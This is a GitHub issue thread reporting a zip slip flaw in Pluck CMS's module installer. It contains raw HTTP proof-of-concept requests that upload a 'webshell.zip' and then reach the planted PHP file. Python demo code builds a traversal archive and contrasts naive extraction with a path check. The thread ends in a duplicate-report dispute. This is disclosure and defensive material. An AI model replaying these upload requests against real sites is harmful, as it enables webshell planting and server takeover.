pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org

Pluck 4.7.15 - Zip Slip Vulnerability #105

Closed debug601 closed 2 years ago

debug601 commented 2 years ago

Issue Summary

Pluck's module and installmodule are vulnerable to directory traversal (via zip slip) and arbitrary code execution. PHP version: php5.2.1

Detailed Description

There is a problem in Pluck 4.7.15. /data/inc/module_install.php allows remote malicious users to upload malicious zip files to traverse directories outside the expected environment, which may allow execution of arbitrary code that will run with the privileges of the user assigned to the Web server.

Vulnerability url: http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule

Vulnerability POC:

POST /pluck4.7.15/admin.php?action=installmodule HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.128/pluck4.7.15/admin.php?action=installmodule
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------26434200512599
Content-Length: 478

-----------------------------26434200512599
Content-Disposition: form-data; name="sendfile"; filename="webshell.zip"
Content-Type: application/x-zip-compressed

PK
-----------------------------26434200512599
Content-Disposition: form-data; name="submit"

Upload
-----------------------------26434200512599--

arbitrary code execution

GET /pluck4.7.15/data/modules/webshell/2.php HTTP/1.1
Host: 192.168.1.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=9f912ae90a81102465d8590f4f007e8e
Connection: close

Impact This vulnerability allows remote code execution and directory traversal under the privileges of the user running the Web server application.
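The mechanism behind the PoC above, as an added example that is not part of the issue or of Pluck's code: an archive entry whose name carries `../` is written relative to the extraction directory by any installer that trusts the entry name as a path, so the file lands outside the module directory. The snippet builds such an archive the way a `webshell.zip` payload would be built (the file contents are a constructed placeholder, not a real shell), extracts it with a deliberately naive loop that mirrors the vulnerable behaviour, and then shows the per-entry path check that an installer such as module_install.php should perform before extracting anything. The `data/modules` layout and all file names are assumptions for the demo.

```python
"""Added example, not Pluck's code: build a zip-slip archive, show a naive
(vulnerable) extraction loop, and show the path check that prevents it."""
import io
import os
import tempfile
import zipfile


def build_zip(entries):
    """Return the bytes of a zip archive with the given {name: content} entries.
    zipfile writes the name verbatim, so '../' segments survive into the archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def naive_extract(zip_bytes, dest_root):
    """What a zip-slip-vulnerable installer does: trusts each entry name as a
    relative path under dest_root and writes the file there."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            path = os.path.join(dest_root, name)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(zf.read(name))
            written.append(os.path.realpath(path))
    return written


def escaping_entries(zip_bytes, dest_root):
    """Names of archive entries whose resolved path would land outside dest_root.
    Catches '../' traversal, absolute names and backslash-separated names."""
    root = os.path.realpath(dest_root)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
            if os.path.commonpath([root, target]) != root:
                bad.append(name)
    return bad


def safe_extract(zip_bytes, dest_root):
    """Check every entry first, then extract: checking up front avoids leaving
    a half-extracted module behind when a bad entry is found late in the archive."""
    bad = escaping_entries(zip_bytes, dest_root)
    if bad:
        raise ValueError(f"zip slip: entries escape {dest_root}: {bad}")
    extracted = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            zf.extract(name, dest_root)
            extracted.append(name)
    return extracted


def demo():
    """Run the attack against a throwaway tree and return
    (paths written outside the module dir, entries flagged, whether safe_extract refused)."""
    placeholder = "<?php echo 'constructed placeholder, not a real shell'; ?>"
    payload = build_zip({
        "webshell/2.php": placeholder,   # stays inside data/modules
        "../outside.php": placeholder,   # zip-slip entry: escapes to data/
    })
    with tempfile.TemporaryDirectory() as tmp:
        modules = os.path.join(tmp, "data", "modules")   # assumed layout
        os.makedirs(modules)
        written = naive_extract(payload, modules)
        inside = os.path.realpath(modules) + os.sep
        escaped = [p for p in written if not p.startswith(inside)]
        flagged = escaping_entries(payload, modules)
        try:
            safe_extract(payload, modules)
            refused = False
        except ValueError:
            refused = True
    return escaped, flagged, refused


if __name__ == "__main__":
    print(demo())
```

The check compares the resolved target against the resolved extraction root rather than looking for the literal string `..`, so encoded or doubled separators and absolute entry names are handled the same way; rejecting the whole archive, rather than skipping the offending entry, keeps a rejected module from being half-installed.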

BSteelooper commented 2 years ago

This is a duplicate of issue #100 which has been fixed in the latest dev version.

debug601 commented 2 years ago

This is a new way to use it.

BSteelooper commented 2 years ago

See if it still exists in the latest dev version. Issue #100 is fixed in the latest version, which should make zip slip impossible.

debug601 commented 2 years ago

See if it still exists in the latest dev version. Issue #100 has been fixed in the latest version, which should make zip slip impossible.

I also tested it on Pluck 4.7.16.dev1 and found this vulnerability. This means that Pluck 4.7.15 has not fixed this exploitation method at all. This is fundamentally different from #100. I believe this vulnerability exists in Pluck 4.7.15, Pluck 4.7.16.dev1-dev3 and all the versions you have released so far. I want to apply for a CVE for each version.

debug601 commented 2 years ago

#100 uses the file "/admin.php?action=themeinstall", while mine (#105) uses "admin.php?action=installmodule". These are two different ways of exploiting it.

debug601 commented 2 years ago

See if it still exists in the latest dev version. Issue #100 is fixed in the latest version, which should make zip slip impossible.

You shouldn't say that my report is a duplicate. It is real.